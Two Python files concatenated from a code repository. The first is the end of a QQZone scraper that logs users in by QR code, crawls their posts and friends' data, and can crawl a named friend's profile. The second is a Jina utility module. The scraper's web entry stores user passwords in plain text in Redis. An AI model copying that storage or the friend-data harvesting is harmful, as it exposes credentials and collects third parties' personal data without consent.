qa.get_friend_detail()
do_analysis_for_all(qa)
qa.user_info.save_user()
# Interface exposed to the web front end
def web_interface(username, nickname, stop_time, mood_num, cookie_text, no_delete, password, pool_flag):
sp = QQZoneAnalysis(use_redis=True, debug=False, username=username, analysis_friend=True, from_web=True,
nickname=nickname, stop_time=stop_time, mood_num=mood_num, no_delete=no_delete, cookie_text=cookie_text, pool_flag=pool_flag)
sp.re.hset(USER_MAP_KEY, username, password)
sp.re.set(USER_LOGIN_STATE + username, 0)
sp.logging_info(username + " init web info success")
try:
state = sp.login_with_qr_code()
sp.remove_qr_code()
        # Exit this thread if login fails
if not state:
sp.logging_info(username + " logging failed")
sp.re.rpush(WEB_SPIDER_INFO + username, LOGIN_FAILED)
exit(1)
else:
            # Store the login state
sp.logging_info(username + " logging success")
sp.re.rpush(WEB_SPIDER_INFO + username, "用户" + str(sp.username) + "登陆成功")
sp.re.set(USER_LOGIN_STATE + username, 1)
except BaseException as e:
sp.format_error(e, "logging failed")
sp.logging_info(username + "logging failed")
sp.re.rpush(WEB_SPIDER_INFO + username, LOGIN_FAILED)
exit(1)
sp.get_main_page_info()
sp.logging_info("get main page success")
try:
        # Thread for fetching the mood (post) data
t1 = threading.Thread(target=sp.get_mood_list)
        # Thread for fetching the friend data
t2 = threading.Thread(target=sp.get_friend_detail)
        t1.daemon = False
        t2.daemon = False
t1.start()
t2.start()
        # Wait for both threads to finish
t1.join()
t2.join()
# sp.user_info.save_user(username)
except BaseException:
sp.re.rpush(WEB_SPIDER_INFO + username, GET_MOOD_FAILED)
exit(1)
sp.re.set(MOOD_FINISH_KEY + str(username), 1)
sp.logging_info("finish to capture data")
sp.logging_info("begin to analysis...")
    # Analyse all the data once the spider has finished
do_analysis_for_all(sp)
sp.user_info.save_user()
sp.logging_info("finish to analysis")
sp.re.set(CLEAN_DATA_KEY + username, 1)
now_user = sp.re.get(FINISH_USER_NUM_KEY)
if now_user is None:
now_user = 0
else:
now_user = int(now_user)
sp.re.set(FINISH_USER_NUM_KEY, now_user + 1)
    # Remove the current user from the waiting list; note that the argument order of lrem differs between redis client versions
sp.re.lrem(WAITING_USER_LIST, 0, username)
sp.logging_info("finish to delete user from waiting list")
sp.logging_info("Success!")
def get_user_basic_info():
sp = QQZoneSpider(use_redis=True, debug=False, mood_begin=0, mood_num=-1,
stop_time='2015-06-01',
download_small_image=False, download_big_image=False,
download_mood_detail=True, download_like_detail=True,
download_like_names=True, recover=False, cookie_text=None)
return sp.user_info
def do_analysis_for_all(sp):
"""
    Compute all the analysis metrics.
    :param sp: an instance of QQZoneAnalysis
:return:
"""
    # Clean the friend data
if sp.analysis_friend:
friend_data_state = sp.clean_friend_data()
if friend_data_state:
            # Get the data of the first (earliest) friend
sp.get_first_friend_info()
            # Find the person with the most mutual friends
sp.get_most_common_friend()
            # Find the shared QQ groups
sp.get_most_group()
sp.get_useful_info_from_json()
if not sp.mood_data_df.empty:
        # Clean the mood data and find who liked and who commented the most
sp.get_most_people()
        # Compute when the moods were posted
sp.calculate_send_time()
sp.draw_cmt_cloud(sp.mood_data_df)
sp.draw_like_cloud(sp.mood_data_df)
        # Keywords in the moods; this is relatively time-consuming
# sp.draw_content_cloud(sp.mood_data_df)
        # Save the mood data
sp.export_mood_df()
sp.calculate_history_like_agree()
def generate_friend_info():
"""
    Capture a friend's QQZone data and analyse it.
:return:
"""
qa = QQZoneAnalysis(use_redis=False, debug=False, analysis_friend=False)
    # It is recommended to configure the friend QQ numbers to crawl in resource/config/friend_info.json
    # A QQ number can also be passed in directly here; it takes priority over the config file, but the config file allows passing QQ numbers in batches
qa.get_friend_mood(friend_qq='')
do_analysis_for_all(qa)
if __name__ == '__main__':
# generate_friend_info()
capture_main_data_and_analysis()
|
helper.py
|
import asyncio
import functools
import json
import math
import os
import random
import re
import sys
import threading
import time
import uuid
import warnings
from argparse import ArgumentParser, Namespace
from datetime import datetime
from itertools import islice
from types import SimpleNamespace
from typing import (
Tuple,
Optional,
Iterator,
Any,
Union,
List,
Dict,
Set,
Sequence,
Iterable,
)
from . import __windows__
__all__ = [
'batch_iterator',
'parse_arg',
'random_port',
'random_identity',
'random_uuid',
'expand_env_var',
'colored',
'ArgNamespace',
'is_valid_local_config_source',
'cached_property',
'typename',
'get_public_ip',
'get_internal_ip',
'convert_tuple_to_list',
'run_async',
'deprecated_alias',
'countdown',
'CatchAllCleanupContextManager',
'download_mermaid_url',
'get_readable_size',
'get_or_reuse_loop',
]
def deprecated_alias(**aliases):
"""
    Usage: pass kwargs with the deprecated arg name as the key and a tuple ``(new_name, deprecate_level)`` as the value,
    where level 0 means a warning is issued and level 1 means an exception is raised.
For example:
.. highlight:: python
.. code-block:: python
@deprecated_alias(input_fn=('inputs', 0), buffer=('input_fn', 0), callback=('on_done', 1), output_fn=('on_done', 1))
:param aliases: maps aliases to new arguments
:return: wrapper
"""
from .excepts import NotSupportedError
def _rename_kwargs(func_name: str, kwargs, aliases):
"""
Raise warnings or exceptions for deprecated arguments.
:param func_name: Name of the function.
:param kwargs: key word arguments from the function which is decorated.
        :param aliases: kwargs with the deprecated arg name as the key and a tuple (new_name, deprecate_level) as the value.
"""
for alias, new_arg in aliases.items():
if not isinstance(new_arg, tuple):
raise ValueError(
f'{new_arg} must be a tuple, with first element as the new name, '
f'second element as the deprecated level: 0 as warning, 1 as exception'
)
if alias in kwargs:
new_name, dep_level = new_arg
if new_name in kwargs:
raise NotSupportedError(
f'{func_name} received both {alias} and {new_name}'
)
if dep_level == 0:
warnings.warn(
f'`{alias}` is renamed to `{new_name}` in `{func_name}()`, the usage of `{alias}` is '
f'deprecated and will be removed in the next version.',
DeprecationWarning,
)
kwargs[new_name] = kwargs.pop(alias)
elif dep_level == 1:
raise NotSupportedError(f'{alias} has been renamed to `{new_name}`')
def deco(f):
"""
Set Decorator function.
:param f: function the decorator is used for
:return: wrapper
"""
@functools.wraps(f)
def wrapper(*args, **kwargs):
"""
Set wrapper function.
:param args: wrapper arguments
:param kwargs: wrapper key word arguments
:return: result of renamed function.
"""
_rename_kwargs(f.__name__, kwargs, aliases)
return f(*args, **kwargs)
return wrapper
return deco
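def _example_deprecated_alias():
    """Hedged usage sketch (added): wires the decorator exactly as in the docstring example above;
    the function and parameter names are illustrative only."""
    @deprecated_alias(input_fn=('inputs', 0), callback=('on_done', 1))
    def f(inputs=None, on_done=None):
        return inputs
    f(input_fn=[1, 2])  # emits a DeprecationWarning and forwards the value to `inputs`
    return f(inputs=[3])  # new-style call, no warning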
def deprecated_method(new_function_name):
def deco(func):
def wrapper(*args, **kwargs):
warnings.warn(
f'`{func.__name__}` is renamed to `{new_function_name}`, the usage of `{func.__name__}` is '
f'deprecated and will be removed.',
DeprecationWarning,
)
return func(*args, **kwargs)
return wrapper
return deco
def get_readable_size(num_bytes: Union[int, float]) -> str:
"""
Transform the bytes into readable value with different units (e.g. 1 KB, 20 MB, 30.1 GB).
:param num_bytes: Number of bytes.
:return: Human readable string representation.
"""
num_bytes = int(num_bytes)
if num_bytes < 1024:
return f'{num_bytes} Bytes'
elif num_bytes < 1024 ** 2:
return f'{num_bytes / 1024:.1f} KB'
elif num_bytes < 1024 ** 3:
return f'{num_bytes / (1024 ** 2):.1f} MB'
else:
return f'{num_bytes / (1024 ** 3):.1f} GB'
def batch_iterator(
data: Iterable[Any],
batch_size: int,
axis: int = 0,
) -> Iterator[Any]:
"""
Get an iterator of batches of data.
For example:
.. highlight:: python
.. code-block:: python
for req in batch_iterator(data, batch_size, split_over_axis):
# Do something with batch
:param data: Data source.
:param batch_size: Size of one batch.
:param axis: Determine which axis to iterate for np.ndarray data.
:yield: data
:return: An Iterator of batch data.
"""
import numpy as np
if not batch_size or batch_size <= 0:
yield data
return
if isinstance(data, np.ndarray):
_l = data.shape[axis]
_d = data.ndim
sl = [slice(None)] * _d
if batch_size >= _l:
yield data
return
for start in range(0, _l, batch_size):
end = min(_l, start + batch_size)
sl[axis] = slice(start, end)
yield data[tuple(sl)]
elif isinstance(data, Sequence):
if batch_size >= len(data):
yield data
return
for _ in range(0, len(data), batch_size):
yield data[_ : _ + batch_size]
elif isinstance(data, Iterable):
# as iterator, there is no way to know the length of it
iterator = iter(data)
while True:
chunk = tuple(islice(iterator, batch_size))
if not chunk:
return
yield chunk
else:
raise TypeError(f'unsupported type: {type(data)}')
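def _example_batch_iterator():
    """Hedged usage sketch (added): the batch sizes and shapes below are illustrative only."""
    import numpy as np
    list_batches = list(batch_iterator(list(range(10)), 4))
    # -> [[0, 1, 2, 3], [4, 5, 6, 7], [8, 9]]
    array_batches = list(batch_iterator(np.arange(12).reshape(3, 4), 2, axis=1))
    # -> two arrays of shape (3, 2), sliced along axis 1
    return list_batches, array_batches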
def parse_arg(v: str) -> Optional[Union[bool, int, str, list, float]]:
"""
Parse the arguments from string to `Union[bool, int, str, list, float]`.
:param v: The string of arguments
:return: The parsed arguments list.
"""
m = re.match(r'^[\'"](.*)[\'"]$', v)
if m:
return m.group(1)
if v.startswith('[') and v.endswith(']'):
# function args must be immutable tuples not list
tmp = v.replace('[', '').replace(']', '').strip().split(',')
if len(tmp) > 0:
return [parse_arg(vv.strip()) for vv in tmp]
else:
return []
try:
v = int(v) # parse int parameter
except ValueError:
try:
v = float(v) # parse float parameter
except ValueError:
if len(v) == 0:
# ignore it when the parameter is empty
v = None
elif v.lower() == 'true': # parse boolean parameter
v = True
elif v.lower() == 'false':
v = False
return v
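def _example_parse_arg():
    """Hedged usage sketch (added): shows how CLI string values are coerced by parse_arg."""
    assert parse_arg('123') == 123
    assert parse_arg('1.5') == 1.5
    assert parse_arg('true') is True
    assert parse_arg('[1, 2, abc]') == [1, 2, 'abc']
    assert parse_arg('"quoted"') == 'quoted'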
def countdown(t: int, reason: str = 'I am blocking this thread') -> None:
"""
Display the countdown in console.
For example:
.. highlight:: python
.. code-block:: python
countdown(10, reason=colored('re-fetch access token', 'cyan', attrs=['bold', 'reverse']))
:param t: Countdown time.
:param reason: A string message of reason for this Countdown.
"""
try:
sys.stdout.write('\n')
sys.stdout.flush()
while t > 0:
t -= 1
msg = f'⏳ {colored("%3d" % t, "yellow")}s left: {reason}'
sys.stdout.write(f'\r{msg}')
sys.stdout.flush()
time.sleep(1)
sys.stdout.write('\n')
sys.stdout.flush()
except KeyboardInterrupt:
sys.stdout.write('no more patience? good bye!')
_random_names = (
(
'first',
'great',
'local',
'small',
'right',
'large',
'young',
'early',
'major',
'clear',
'black',
'whole',
'third',
'white',
'short',
'human',
'royal',
'wrong',
'legal',
'final',
'close',
'total',
'prime',
'happy',
'sorry',
'basic',
'aware',
'ready',
'green',
'heavy',
'extra',
'civil',
'chief',
'usual',
'front',
'fresh',
'joint',
'alone',
'rural',
'light',
'equal',
'quiet',
'quick',
'daily',
'urban',
'upper',
'moral',
'vital',
'empty',
'brief',
),
(
'world',
'house',
'place',
'group',
'party',
'money',
'point',
'state',
'night',
'water',
'thing',
'order',
'power',
'court',
'level',
'child',
'south',
'staff',
'woman',
'north',
'sense',
'death',
'range',
'table',
'trade',
'study',
'other',
'price',
'class',
'union',
'value',
'paper',
'right',
'voice',
'stage',
'light',
'march',
'board',
'month',
'music',
'field',
'award',
'issue',
'basis',
'front',
'heart',
'force',
'model',
'space',
'peter',
),
)
def random_name() -> str:
"""
Generate a random name from list.
:return: A Random name.
"""
return '_'.join(random.choice(_random_names[j]) for j in range(2))
def random_port() -> Optional[int]:
"""
Get a random available port number from '49153' to '65535'.
:return: A random port.
"""
import threading
import multiprocessing
from contextlib import closing
import socket
def _get_port(port=0):
with multiprocessing.Lock():
with threading.Lock():
with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as s:
try:
s.bind(('', port))
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
return s.getsockname()[1]
except OSError:
pass
_port = None
if 'JINA_RANDOM_PORT_MIN' in os.environ or 'JINA_RANDOM_PORT_MAX' in os.environ:
min_port = int(os.environ.get('JINA_RANDOM_PORT_MIN', '49153'))
max_port = int(os.environ.get('JINA_RANDOM_PORT_MAX', '65535'))
all_ports = list(range(min_port, max_port + 1))
random.shuffle(all_ports)
for _port in all_ports:
if _get_port(_port) is not None:
break
else:
raise OSError(
f'can not find an available port between [{min_port}, {max_port}].'
)
else:
_port = _get_port()
return int(_port)
def random_identity(use_uuid1: bool = False) -> str:
"""
Generate random UUID.
..note::
A MAC address or time-based ordering (UUID1) can afford increased database performance, since it's less work
to sort numbers closer-together than those distributed randomly (UUID4) (see here).
A second related issue, is that using UUID1 can be useful in debugging, even if origin data is lost or not
explicitly stored.
:param use_uuid1: use UUID1 instead of UUID4. This is the default Document ID generator.
:return: A random UUID.
"""
return str(random_uuid(use_uuid1))
def random_uuid(use_uuid1: bool = False) -> uuid.UUID:
"""
Get a random UUID.
:param use_uuid1: Use UUID1 if True, else use UUID4.
:return: A random UUID.
"""
return uuid.uuid1() if use_uuid1 else uuid.uuid4()
def expand_env_var(v: str) -> Optional[Union[bool, int, str, list, float]]:
"""
Expand the environment variables.
:param v: String of environment variables.
:return: Parsed environment variables.
"""
if isinstance(v, str):
return parse_arg(os.path.expandvars(v))
else:
return v
def expand_dict(
d: Dict, expand_fn=expand_env_var, resolve_cycle_ref=True
) -> Dict[str, Any]:
"""
Expand variables from YAML file.
:param d: Target Dict.
:param expand_fn: Parsed environment variables.
:param resolve_cycle_ref: Defines if cyclic references should be resolved.
:return: Expanded variables.
"""
expand_map = SimpleNamespace()
pat = re.compile(r'{.+}|\$[a-zA-Z0-9_]*\b')
def _scan(sub_d: Union[Dict, List], p):
if isinstance(sub_d, dict):
for k, v in sub_d.items():
if isinstance(v, dict):
p.__dict__[k] = SimpleNamespace()
_scan(v, p.__dict__[k])
elif isinstance(v, list):
p.__dict__[k] = []
_scan(v, p.__dict__[k])
else:
p.__dict__[k] = v
elif isinstance(sub_d, list):
for idx, v in enumerate(sub_d):
if isinstance(v, dict):
p.append(SimpleNamespace())
_scan(v, p[idx])
elif isinstance(v, list):
p.append(list())
_scan(v, p[idx])
else:
p.append(v)
def _replace(sub_d: Union[Dict, List], p):
if isinstance(sub_d, Dict):
for k, v in sub_d.items():
if isinstance(v, (dict, list)):
_replace(v, p.__dict__[k])
elif isinstance(v, str) and pat.findall(v):
sub_d[k] = _sub(v, p)
elif isinstance(sub_d, List):
for idx, v in enumerate(sub_d):
if isinstance(v, (dict, list)):
_replace(v, p[idx])
elif isinstance(v, str) and pat.findall(v):
sub_d[idx] = _sub(v, p)
def _sub(v, p):
if resolve_cycle_ref:
try:
v = v.format(root=expand_map, this=p)
except KeyError:
pass
return expand_fn(v)
_scan(d, expand_map)
_replace(d, expand_map)
return d
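def _example_expand_dict():
    """Hedged usage sketch (added): the keys below are illustrative; `{root.*}` placeholders
    refer back into the same dict and `$VAR` values are expanded from the environment."""
    d = {'name': 'demo', 'greeting': 'hello {root.name}', 'port': '$JINA_RANDOM_PORT_MIN'}
    return expand_dict(d)  # 'greeting' becomes 'hello demo'; 'port' is expanded only if the env var is set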
_ATTRIBUTES = {
'bold': 1,
'dark': 2,
'underline': 4,
'blink': 5,
'reverse': 7,
'concealed': 8,
}
_HIGHLIGHTS = {
'on_grey': 40,
'on_red': 41,
'on_green': 42,
'on_yellow': 43,
'on_blue': 44,
'on_magenta': 45,
'on_cyan': 46,
'on_white': 47,
}
_COLORS = {
'black': 30,
'red': 31,
'green': 32,
'yellow': 33,
'blue': 34,
'magenta': 35,
'cyan': 36,
'white': 37,
}
_RESET = '\033[0m'
if __windows__:
os.system('color')
def colored(
text: str,
color: Optional[str] = None,
on_color: Optional[str] = None,
attrs: Optional[Union[str, list]] = None,
) -> str:
"""
Give the text with color.
:param text: The target text.
:param color: The color of text. Chosen from the following.
{
'grey': 30,
'red': 31,
'green': 32,
'yellow': 33,
'blue': 34,
'magenta': 35,
'cyan': 36,
'white': 37
}
:param on_color: The on_color of text. Chosen from the following.
{
'on_grey': 40,
'on_red': 41,
'on_green': 42,
'on_yellow': 43,
'on_blue': 44,
'on_magenta': 45,
'on_cyan': 46,
'on_white': 47
}
:param attrs: Attributes of color. Chosen from the following.
{
'bold': 1,
'dark': 2,
'underline': 4,
'blink': 5,
'reverse': 7,
'concealed': 8
}
:return: Colored text.
"""
if 'JINA_LOG_NO_COLOR' not in os.environ:
fmt_str = '\033[%dm%s'
if color:
text = fmt_str % (_COLORS[color], text)
if on_color:
text = fmt_str % (_HIGHLIGHTS[on_color], text)
if attrs:
if isinstance(attrs, str):
attrs = [attrs]
if isinstance(attrs, list):
for attr in attrs:
text = fmt_str % (_ATTRIBUTES[attr], text)
text += _RESET
return text
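def _example_colored():
    """Hedged usage sketch (added): wraps text in ANSI escape codes unless JINA_LOG_NO_COLOR is set."""
    return colored('ready', color='green', attrs=['bold', 'underline'])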
class ColorContext:
def __init__(self, color: str, bold: Optional[bool] = False):
self._color = color
self._bold = bold
def __enter__(self):
fmt_str = '\033[1;%dm' if self._bold else '\033[0;%dm'
c = fmt_str % (_COLORS[self._color])
print(c, flush=True, end='')
return self
def __exit__(self, typ, value, traceback):
print(_RESET, flush=True, end='')
def warn_unknown_args(unknown_args: List[str]):
"""Creates warnings for all given arguments.
:param unknown_args: arguments that are possibly unknown to Jina
"""
from cli.lookup import _build_lookup_table
all_args = _build_lookup_table()[0]
has_migration_tip = False
real_unknown_args = []
warn_strs = []
for arg in unknown_args:
if arg.replace('--', '') not in all_args:
from .parsers.deprecated import get_deprecated_replacement
new_arg = get_deprecated_replacement(arg)
if new_arg:
if not has_migration_tip:
warn_strs.append('Migration tips:')
has_migration_tip = True
warn_strs.append(f'\t`{arg}` has been renamed to `{new_arg}`')
real_unknown_args.append(arg)
if real_unknown_args:
warn_strs = [f'ignored unknown argument: {real_unknown_args}.'] + warn_strs
warnings.warn(''.join(warn_strs))
class ArgNamespace:
"""Helper function for argparse.Namespace object."""
@staticmethod
def kwargs2list(kwargs: Dict) -> List[str]:
"""
Convert dict to an argparse-friendly list.
:param kwargs: dictionary of key-values to be converted
:return: argument list
"""
args = []
from .executors import BaseExecutor
for k, v in kwargs.items():
k = k.replace('_', '-')
if v is not None:
if isinstance(v, bool):
if v:
args.append(f'--{k}')
elif isinstance(v, list): # for nargs
args.extend([f'--{k}', *(str(vv) for vv in v)])
elif isinstance(v, dict):
args.extend([f'--{k}', json.dumps(v)])
elif isinstance(v, type) and issubclass(v, BaseExecutor):
args.extend([f'--{k}', v.__name__])
else:
args.extend([f'--{k}', str(v)])
return args
@staticmethod
def kwargs2namespace(
kwargs: Dict[str, Union[str, int, bool]],
parser: ArgumentParser,
warn_unknown: bool = False,
fallback_parsers: List[ArgumentParser] = None,
) -> Namespace:
"""
Convert dict to a namespace.
:param kwargs: dictionary of key-values to be converted
:param parser: the parser for building kwargs into a namespace
:param warn_unknown: True, if unknown arguments should be logged
:param fallback_parsers: a list of parsers to help resolving the args
:return: argument list
"""
args = ArgNamespace.kwargs2list(kwargs)
p_args, unknown_args = parser.parse_known_args(args)
if warn_unknown and unknown_args:
_leftovers = set(unknown_args)
if fallback_parsers:
for p in fallback_parsers:
_, _unk_args = p.parse_known_args(args)
_leftovers = _leftovers.intersection(_unk_args)
if not _leftovers:
# all args have been resolved
break
warn_unknown_args(_leftovers)
return p_args
@staticmethod
def get_non_defaults_args(
args: Namespace, parser: ArgumentParser, taboo: Optional[Set[str]] = None
) -> Dict:
"""
Get non-default args in a dict.
:param args: the namespace to parse
:param parser: the parser for referring the default values
:param taboo: exclude keys in the final result
:return: non defaults
"""
if taboo is None:
taboo = set()
_defaults = vars(parser.parse_args([]))
return {
k: v
for k, v in vars(args).items()
if k in _defaults and k not in taboo and _defaults[k] != v
}
@staticmethod
def flatten_to_dict(
args: Union[Dict[str, 'Namespace'], 'Namespace']
) -> Dict[str, Any]:
"""Convert argparse.Namespace to dict to be uploaded via REST.
        :param args: a Namespace, or a dict whose values are Namespaces, lists of Namespaces, or plain values.
:return: pea args
"""
if isinstance(args, Namespace):
return vars(args)
elif isinstance(args, dict):
pea_args = {}
for k, v in args.items():
if isinstance(v, Namespace):
pea_args[k] = vars(v)
elif isinstance(v, list):
pea_args[k] = [vars(_) for _ in v]
else:
pea_args[k] = v
return pea_args
def is_valid_local_config_source(path: str) -> bool:
# TODO: this function must be refactored before 1.0 (Han 12.22)
"""
Check if the path is valid.
:param path: Local file path.
:return: True if the path is valid else False.
"""
try:
from .jaml import parse_config_source
parse_config_source(path)
return True
except FileNotFoundError:
return False
def get_full_version() -> Optional[Tuple[Dict, Dict]]:
"""
Get the version of libraries used in Jina and environment variables.
:return: Version information and environment variables
"""
import os, grpc, zmq, numpy, google.protobuf, yaml, platform
from . import (
__version__,
__proto_version__,
__jina_env__,
__uptime__,
__unset_msg__,
)
from google.protobuf.internal import api_implementation
from grpc import _grpcio_metadata
from jina.logging.predefined import default_logger
from uuid import getnode
try:
info = {
'jina': __version__,
'jina-proto': __proto_version__,
'jina-vcs-tag': os.environ.get('JINA_VCS_VERSION', __unset_msg__),
'libzmq': zmq.zmq_version(),
            'pyzmq': zmq.pyzmq_version(),
'protobuf': google.protobuf.__version__,
'proto-backend': api_implementation._default_implementation_type,
'grpcio': getattr(grpc, '__version__', _grpcio_metadata.__version__),
'pyyaml': yaml.__version__,
'python': platform.python_version(),
'platform': platform.system(),
'platform-release': platform.release(),
'platform-version': platform.version(),
'architecture': platform.machine(),
'processor': platform.processor(),
'uid': getnode(),
'session-id': str(random_uuid(use_uuid1=True)),
'uptime': __uptime__,
'ci-vendor': get_ci_vendor() or __unset_msg__,
}
env_info = {k: os.getenv(k, __unset_msg__) for k in __jina_env__}
full_version = info, env_info
except Exception as e:
default_logger.error(str(e))
full_version = None
return full_version
def format_full_version_info(info: Dict, env_info: Dict) -> str:
"""
Format the version information.
:param info: Version information of Jina libraries.
:param env_info: The Jina environment variables.
:return: Formatted version information.
"""
version_info = '\n'.join(f'- {k:30s}{v}' for k, v in info.items())
env_info = '\n'.join(f'* {k:30s}{v}' for k, v in env_info.items())
return version_info + '\n' + env_info
def _update_policy():
if __windows__:
asyncio.set_event_loop_policy(asyncio.WindowsSelectorEventLoopPolicy())
elif 'JINA_DISABLE_UVLOOP' in os.environ:
return
else:
try:
import uvloop
asyncio.set_event_loop_policy(uvloop.EventLoopPolicy())
except ModuleNotFoundError:
warnings.warn(
'Install `uvloop` via `pip install "jina[uvloop]"` for better performance.'
)
def get_or_reuse_loop():
"""
    Get a new event loop, or reuse the currently open one.
    :return: a new or reused event loop.
"""
try:
loop = asyncio.get_running_loop()
if loop.is_closed():
raise RuntimeError
except RuntimeError:
_update_policy()
# no running event loop
# create a new loop
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
return loop
def typename(obj):
"""
Get the typename of object.
:param obj: Target object.
:return: Typename of the obj.
"""
if not isinstance(obj, type):
obj = obj.__class__
try:
return f'{obj.__module__}.{obj.__name__}'
except AttributeError:
return str(obj)
class CatchAllCleanupContextManager:
"""
    This context manager guarantees that the :method:``__exit__`` of the
    sub context is called, even when there is an exception in the
    :method:``__enter__``.
:param sub_context: The context, that should be taken care of.
"""
def __init__(self, sub_context):
self.sub_context = sub_context
def __enter__(self):
pass
def __exit__(self, exc_type, exc_val, exc_tb):
if exc_type:
self.sub_context.__exit__(exc_type, exc_val, exc_tb)
class cached_property:
"""The decorator to cache property of a class."""
def __init__(self, func):
"""
Create the :class:`cached_property`.
:param func: Cached function.
"""
self.func = func
def __get__(self, obj, cls):
cached_value = obj.__dict__.get(f'CACHED_{self.func.__name__}', None)
if cached_value is not None:
return cached_value
value = obj.__dict__[f'CACHED_{self.func.__name__}'] = self.func(obj)
return value
def __delete__(self, obj):
cached_value = obj.__dict__.get(f'CACHED_{self.func.__name__}', None)
if cached_value is not None:
if hasattr(cached_value, 'close'):
cached_value.close()
del obj.__dict__[f'CACHED_{self.func.__name__}']
class _cache_invalidate:
"""Class for cache invalidation, remove strategy.
:param func: func to wrap as a decorator.
:param attribute: String as the function name to invalidate cached
data. E.g. in :class:`cached_property` we cache data inside the class obj
with the `key`: `CACHED_{func.__name__}`, the func name in `cached_property`
is the name to invalidate.
"""
def __init__(self, func, attribute: str):
self.func = func
self.attribute = attribute
def __call__(self, *args, **kwargs):
obj = args[0]
cached_key = f'CACHED_{self.attribute}'
if cached_key in obj.__dict__:
del obj.__dict__[cached_key] # invalidate
self.func(*args, **kwargs)
def __get__(self, obj, cls):
from functools import partial
return partial(self.__call__, obj)
def cache_invalidate(attribute: str):
"""The cache invalidator decorator to wrap the method call.
Check the implementation in :class:`_cache_invalidate`.
:param attribute: The func name as was stored in the obj to invalidate.
:return: wrapped method.
"""
def _wrap(func):
return _cache_invalidate(func, attribute)
return _wrap
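def _example_cached_property():
    """Hedged usage sketch (added): `Dataset` below is an illustrative class, not part of this module."""
    class Dataset:
        def __init__(self, path):
            self.path = path
        @cached_property
        def rows(self):
            # computed once and stored on the instance as `CACHED_rows`
            return [self.path, 'row1', 'row2']
        @cache_invalidate(attribute='rows')
        def set_path(self, path):
            # dropping `CACHED_rows` forces the next access to recompute
            self.path = path
    d = Dataset('a.csv')
    _ = d.rows           # computed and cached
    d.set_path('b.csv')  # cache invalidated
    return d.rows        # recomputed with the new path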
def get_now_timestamp():
"""
Get the datetime.
:return: The datetime in int format.
"""
now = datetime.now()
return int(datetime.timestamp(now))
def get_readable_time(*args, **kwargs):
"""
Get the datetime in human readable format (e.g. 115 days and 17 hours and 46 minutes and 40 seconds).
For example:
.. highlight:: python
.. code-block:: python
get_readable_time(seconds=1000)
:param args: arguments for datetime.timedelta
:param kwargs: key word arguments for datetime.timedelta
:return: Datetime in human readable format.
"""
import datetime
secs = float(datetime.timedelta(*args, **kwargs).total_seconds())
units = [('day', 86400), ('hour', 3600), ('minute', 60), ('second', 1)]
parts = []
for unit, mul in units:
if secs / mul >= 1 or mul == 1:
if mul > 1:
n = int(math.floor(secs / mul))
secs -= n * mul
else:
n = int(secs)
parts.append(f'{n} {unit}' + ('' if n == 1 else 's'))
return ' and '.join(parts)
def get_internal_ip():
"""
Return the private IP address of the gateway for connecting from other machine in the same network.
:return: Private IP address.
"""
import socket
ip = '127.0.0.1'
try:
with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
# doesn't even have to be reachable
s.connect(('10.255.255.255', 1))
ip = s.getsockname()[0]
except Exception:
pass
return ip
def get_public_ip(timeout: float = 0.3):
"""
Return the public IP address of the gateway for connecting from other machine in the public network.
:param timeout: the seconds to wait until return None.
:return: Public IP address.
.. warn::
        Setting :param:`timeout` to a large number will block the Flow.
"""
import urllib.request
results = []
def _get_ip(url):
try:
req = urllib.request.Request(url, headers={'User-Agent': 'Mozilla/5.0'})
with urllib.request.urlopen(req, timeout=timeout) as fp:
_ip = fp.read().decode().strip()
results.append(_ip)
except:
            pass  # intentionally ignored, the public IP is simply not shown
ip_server_list = [
'https://api.ipify.org',
'https://ident.me',
'https://checkip.amazonaws.com/',
]
threads = []
for idx, ip in enumerate(ip_server_list):
t = threading.Thread(target=_get_ip, args=(ip,))
threads.append(t)
t.start()
for t in threads:
t.join(timeout)
for r in results:
if r:
return r
def convert_tuple_to_list(d: Dict):
"""
Convert all the tuple type values from a dict to list.
:param d: Dict type of data.
"""
for k, v in d.items():
if isinstance(v, tuple):
d[k] = list(v)
elif isinstance(v, dict):
convert_tuple_to_list(v)
def is_jupyter() -> bool: # pragma: no cover
"""
    Check if we're running in a Jupyter notebook, using the magic command `get_ipython` that is only available in Jupyter.
:return: True if run in a Jupyter notebook else False.
"""
try:
get_ipython # noqa: F821
except NameError:
return False
shell = get_ipython().__class__.__name__ # noqa: F821
return shell in ['ZMQInteractiveShell', 'Shell']
def run_async(func, *args, **kwargs):
"""Generalized asyncio.run for jupyter notebook.
When running inside jupyter, an eventloop is already exist, can't be stopped, can't be killed.
Directly calling asyncio.run will fail, as This function cannot be called when another asyncio event loop
is running in the same thread.
.. see_also:
https://stackoverflow.com/questions/55409641/asyncio-run-cannot-be-called-from-a-running-event-loop
call `run_async(my_function, any_event_loop=True, *args, **kwargs)` to enable run with any eventloop
:param func: function to run
:param args: parameters
:param kwargs: key-value parameters
:return: asyncio.run(func)
"""
any_event_loop = kwargs.pop('any_event_loop', False)
class _RunThread(threading.Thread):
"""Create a running thread when in Jupyter notebook."""
def run(self):
"""Run given `func` asynchronously."""
self.result = asyncio.run(func(*args, **kwargs))
try:
loop = asyncio.get_running_loop()
except RuntimeError:
loop = None
if loop and loop.is_running():
# eventloop already exist
# running inside Jupyter
if any_event_loop or is_jupyter():
thread = _RunThread()
thread.start()
thread.join()
try:
return thread.result
except AttributeError:
from .excepts import BadClient
raise BadClient(
                    'something went wrong when running the event loop, the result can not be retrieved'
)
else:
raise RuntimeError(
                'you have an event loop running but are not using Jupyter/IPython, '
                'this may mean you are using Jina with another integration; if so, you '
                'may want to use Client/Flow(asyncio=True). If not, then '
                'please report this issue here: https://github.com/jina-ai/jina'
)
else:
return asyncio.run(func(*args, **kwargs))
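def _example_run_async():
    """Hedged usage sketch (added): `_coro` below is an illustrative coroutine only."""
    async def _coro(x):
        return x
    # works both with and without an already-running event loop (e.g. inside Jupyter)
    return run_async(_coro, 42)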
def slugify(value):
"""
    Normalize a string: strip surrounding whitespace, replace spaces with underscores, and remove characters that are not alphanumerics, underscores, hyphens or dots.
:param value: Original string.
:return: Processed string.
"""
s = str(value).strip().replace(' ', '_')
return re.sub(r'(?u)[^-\w.]', '', s)
def is_yaml_filepath(val) -> bool:
"""
Check if the file is YAML file.
:param val: Path of target file.
:return: True if the file is YAML else False.
"""
    r = r'.*\.ya?ml$' if __windows__ else r'^[/\w\-\_\.]+\.ya?ml$'
return re.match(r, val.strip()) is not None
